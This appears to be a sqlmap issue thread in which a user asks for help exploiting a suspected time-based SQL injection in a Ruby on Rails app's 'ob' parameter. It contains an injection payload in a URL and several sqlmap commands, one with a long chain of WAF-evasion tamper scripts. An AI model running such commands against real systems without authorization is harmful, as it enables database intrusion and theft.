sqlmap
Not a bug. Need help to find the right syntax
Hello,
First, sorry to open an issue about this again. I know it's not an issue with sqlmap, but I am lost with Ruby on Rails SQL injection. I really need help to find the right syntax.
Ruby on Rails SQL injection
https://localhost/index.htm?cat=1&ob[mysql%20where%20sleep(1/10)%20%3b%20--%20.user][1]=1&off=1
So I tried your syntax from this issue:
sqlmap.py -u "https://localhost/index.htm?cat=1&ob[mysql%20where%20sleep(1/10)%20%3b%20--%20.user][1]=1&off=1" --eval='import time;uri=uri.replace("user]", "user%d]" % time.time())' --level=3 --risk=3 --time-sec=1
I got an error:
[CRITICAL] an error occurred while evaluating provided code ('invalid syntax')
I also tried to inject the parameter directly with this command:
sqlmap.py -u "https://localhost/index.htm?cat=1&ob=1*&off=1" --risk=3 --level=3 --time-sec=1
False, normal blind instead of time-based:
Appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT)' injectable
[WARNING] false positive or unexploitable injection point detected
Don't you think it's a false positive?
Try this:
sqlmap.py -u "https://localhost/index.htm?cat=1&ob=1&off=1" --random-agent --batch --risk=3 --level=3 -p ob --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
Use --technique=T to force time-based injection.
@brandonalmost sorry for ignoring this. Is there a CVE related to this SQLi? I mean, from your payload it doesn't look like a proper SQL injection (no delimiter after [mysql).
@brandonalmost rerun your command to confirm it's a valid SQLi; also, kindly proceed with --drop-set-cookie since it's a Boolean.